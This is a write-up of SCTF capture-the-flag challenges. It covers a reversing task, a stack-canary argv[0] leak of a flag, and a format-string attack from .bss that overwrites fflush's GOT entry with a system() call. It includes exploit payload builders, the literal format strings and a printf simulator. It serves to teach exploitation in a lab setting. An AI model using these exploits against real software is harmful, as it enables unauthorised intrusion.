Analysis of SCTF PWN test questions

Source: Internet
Author: User

Re1

This is a simple string encryption. The program uses multiple threads and then synchronizes them: the verification thread is not started until the encryption thread has finished. The problem is that IDA's F5 decompilation came out wrong; I don't know whether some obfuscation mechanism is responsible.

When I first looked at the F5 pseudo-code I was completely confused, so I went to the assembly to see what was really going on.

Decryption can be done directly with a lookup table, or by writing the inverse of the algorithm.

Pwn1

checksec shows the protections: canary + NX. The vulnerability is a simple stack overflow, but with the canary in place there is no way to hijack the program's control flow.

Since the flag has already been read into memory, the idea is to leak it. Later I learned about the SSP (stack smashing protector) leak trick: deliberately trigger the canary check.

When the check fails, glibc's __stack_chk_fail prints the program name in its abort message ("*** stack smashing detected ***: <name> terminated"), and that name is taken from argv[0]. Because argv[] is the parameter block handed to main when the process starts, it lives above the current stack frame at a higher address, so the overflow can reach it.

So the overflow can overwrite argv[0] with a pointer to the flag, and the message leaks the flag. The structure of the exploit is Exp = junk + pointer to the flag. One caveat: this only works on older glibc builds; recent glibc versions (from around 2.26) no longer print argv[0] in that message.
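As an added example (not code from the original writeup), here is the payload builder and leak parser for the SSP trick in plain Python. The buffer-to-argv[0] distance BUF_TO_ARGV0, the flag address FLAG_ADDR and the sample stderr text are all constructed assumptions, not values recovered from the real binary; run_and_leak() is the only part that needs a target to exist.

```python
import os
import re
import struct
import subprocess

# Constructed assumptions, not values from the original writeup: the
# overflowing buffer lies BUF_TO_ARGV0 bytes below main's argv[0] slot,
# and the flag was read into a global buffer at FLAG_ADDR (32-bit ELF).
BUF_TO_ARGV0 = 0x1c4
FLAG_ADDR = 0x0804a060


def p32(value):
    """Pack a 32-bit little-endian pointer."""
    return struct.pack("<I", value & 0xffffffff)


def build_ssp_payload(buf_to_argv0=BUF_TO_ARGV0, flag_addr=FLAG_ADDR):
    """Junk up to the argv[0] slot, then the flag pointer written over it.

    The junk runs over the canary on the way, so main's epilogue calls
    __stack_chk_fail(); on older glibc that prints argv[0] as the program
    name in "*** stack smashing detected ***: <argv[0]> terminated", and
    argv[0] now points at the flag buffer.
    """
    return b"A" * buf_to_argv0 + p32(flag_addr)


def check_badchars(payload, badchars=b"\x00\n"):
    """Bytes that would cut the input short if the target reads with
    gets()/scanf("%s") instead of read(); returns the offending bytes."""
    return bytes(sorted(set(payload) & set(badchars)))


SSP_MSG = re.compile(rb"\*\*\* stack smashing detected \*\*\*: (.*?) terminated")


def extract_leak(stderr):
    """Pull the 'program name' out of the SSP abort message, or None if the
    libc did not include one (newer glibc drops argv[0] from the message)."""
    m = SSP_MSG.search(stderr)
    return m.group(1) if m else None


def run_and_leak(binary, payload):
    """Feed the payload on stdin and read the leak back from stderr.

    glibc writes the fatal message to /dev/tty when it can open one, so
    LIBC_FATAL_STDERR_=1 forces it to fd 2 when testing in a terminal; a
    remote service without a tty falls back to stderr by itself.
    """
    env = dict(os.environ, LIBC_FATAL_STDERR_="1")
    proc = subprocess.run([binary], input=payload, capture_output=True, env=env)
    return extract_leak(proc.stderr)


# Constructed sample of what an old-glibc target prints, for offline use.
SAMPLE_STDERR = (b"*** stack smashing detected ***: "
                 b"SCTF{constructed_sample_flag} terminated\n")

if __name__ == "__main__":
    payload = build_ssp_payload()
    if check_badchars(payload):
        raise SystemExit("payload contains bytes the input routine may stop at")
    print(extract_leak(SAMPLE_STDERR))
```

The flag buffer has to be NUL-terminated for the %s in the abort message to stop where the flag ends, which is normally true when the program reads the flag with fgets() or similar into a zeroed global.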

Pwn2

This one threw me at first, because every format string vulnerability I had met before had the format string stored on the stack. Here the format string is stored in the .bss section. A format string vulnerability gives a write to an arbitrary address, but when the format string itself is not on the stack you cannot place the target address in a stack slot for %n to use, which is awkward.

Then I thought that I could write an address onto the stack and use it as a springboard. The premise is that the stack must contain a pointer to another stack location; debugging showed that such a pointer really exists.

So the write can be constructed: first use the stack-to-stack pointer with %n to store the target address into the slot it points at, then use that slot with %n to write the value to the target.

Because fflush() is called immediately after the read, I overwrite fflush's GOT entry directly. The binary already contains a call to system(), and its argument has even been pushed already, so I just overwrite the GOT entry with that address.

Two format strings are

"%134525283x%4$n"

"%134520973x%12$n"
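As an added example (not code from the original writeup), the following Python builds the two-stage springboard write and checks it against a small model of printf's %x/%n/%hn handling, so the chain can be traced offline. The stack layout (STACK_BASE, the pointer at %4$ aimed at %12$), GOT_FFLUSH and SYSTEM_CALL_SITE are constructed assumptions; only the indices 4 and 12 and the shape of the strings come from the writeup.

```python
import re

# Constructed layout, not recovered from the original binary: "%i$" reads the
# 32-bit word at STACK_BASE + 4*i. Slot 4 already holds a pointer to slot 12
# (the stack-to-stack pointer found while debugging), fflush's GOT entry is at
# GOT_FFLUSH, and the code that pushes the argument and calls system() is at
# SYSTEM_CALL_SITE. All four values are hypothetical.
STACK_BASE = 0xbffff000
PTR_INDEX = 4          # %4$  -> word that points into the stack
SLOT_INDEX = 12        # %12$ -> the word it points at
GOT_FFLUSH = 0x0804b00c
SYSTEM_CALL_SITE = 0x08048500


def fmt_write(index, value, already_printed=0):
    """One 32-bit %n write through stack argument `index`.

    %<width>x pads the output to `width` characters, so the count that %n
    stores equals `value` once the padding is added to whatever the program
    had already printed during this printf call.
    """
    pad = value - already_printed
    if pad < 0:
        raise ValueError("count can only grow; use %hn halves for smaller values")
    return ("%%%dx" % pad if pad else "") + "%%%d$n" % index


def springboard_write(ptr_index, slot_index, target_addr, value):
    """Two-stage write for a format string that lives in .bss.

    Stage 1: %ptr_index$n dereferences the stack-to-stack pointer and stores
    target_addr into the slot it points at. Stage 2: %slot_index$n now
    dereferences that slot, i.e. writes `value` to target_addr.
    """
    return [fmt_write(ptr_index, target_addr), fmt_write(slot_index, value)]


SPEC = re.compile(r"%(?:(\d+)\$)?(\d*)(hn|n|x)")


def read32(mem, addr):
    return int.from_bytes(bytes(mem.get(addr + k, 0) for k in range(4)), "little")


def write_le(mem, addr, value, size):
    for k in range(size):
        mem[addr + k] = (value >> (8 * k)) & 0xff


def run_printf(fmt, mem, stack_base=STACK_BASE):
    """Minimal printf model: %x with width, %n and %hn, positional or not.
    Returns the character count; writes land in `mem` (addr -> byte)."""
    printed = 0
    cursor = 1            # next vararg for non-positional conversions
    pos = 0
    for m in SPEC.finditer(fmt):
        printed += m.start() - pos          # literal text before the spec
        pos = m.end()
        idx = int(m.group(1)) if m.group(1) else None
        width = int(m.group(2)) if m.group(2) else 0
        conv = m.group(3)
        if idx is None:
            idx, cursor = cursor, cursor + 1
        arg = read32(mem, stack_base + 4 * idx)
        if conv == "x":
            printed += max(width, len("%x" % arg))
        elif conv == "n":
            write_le(mem, arg, printed & 0xffffffff, 4)
        else:                               # hn: low 16 bits only
            write_le(mem, arg, printed & 0xffff, 2)
    return printed + len(fmt) - pos


def demo():
    """Run the two-string chain against the modelled stack and return what
    fflush's GOT entry holds afterwards."""
    mem = {}
    write_le(mem, STACK_BASE + 4 * PTR_INDEX, STACK_BASE + 4 * SLOT_INDEX, 4)
    write_le(mem, GOT_FFLUSH, 0xf7e5c0d0, 4)   # constructed libc address
    for fmt in springboard_write(PTR_INDEX, SLOT_INDEX, GOT_FFLUSH, SYSTEM_CALL_SITE):
        run_printf(fmt, mem)
    return read32(mem, GOT_FFLUSH)


if __name__ == "__main__":
    print(springboard_write(4, 12, 134525283, 134520973))
    print(hex(demo()))
```

Each string prints roughly 134 MB of padding because the target and value are both 0x0804xxxx-range addresses; when the output goes over a slow link, the %hn branch of the model is the one to reach for, writing the address in two 16-bit halves so no single count has to exceed 65535.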
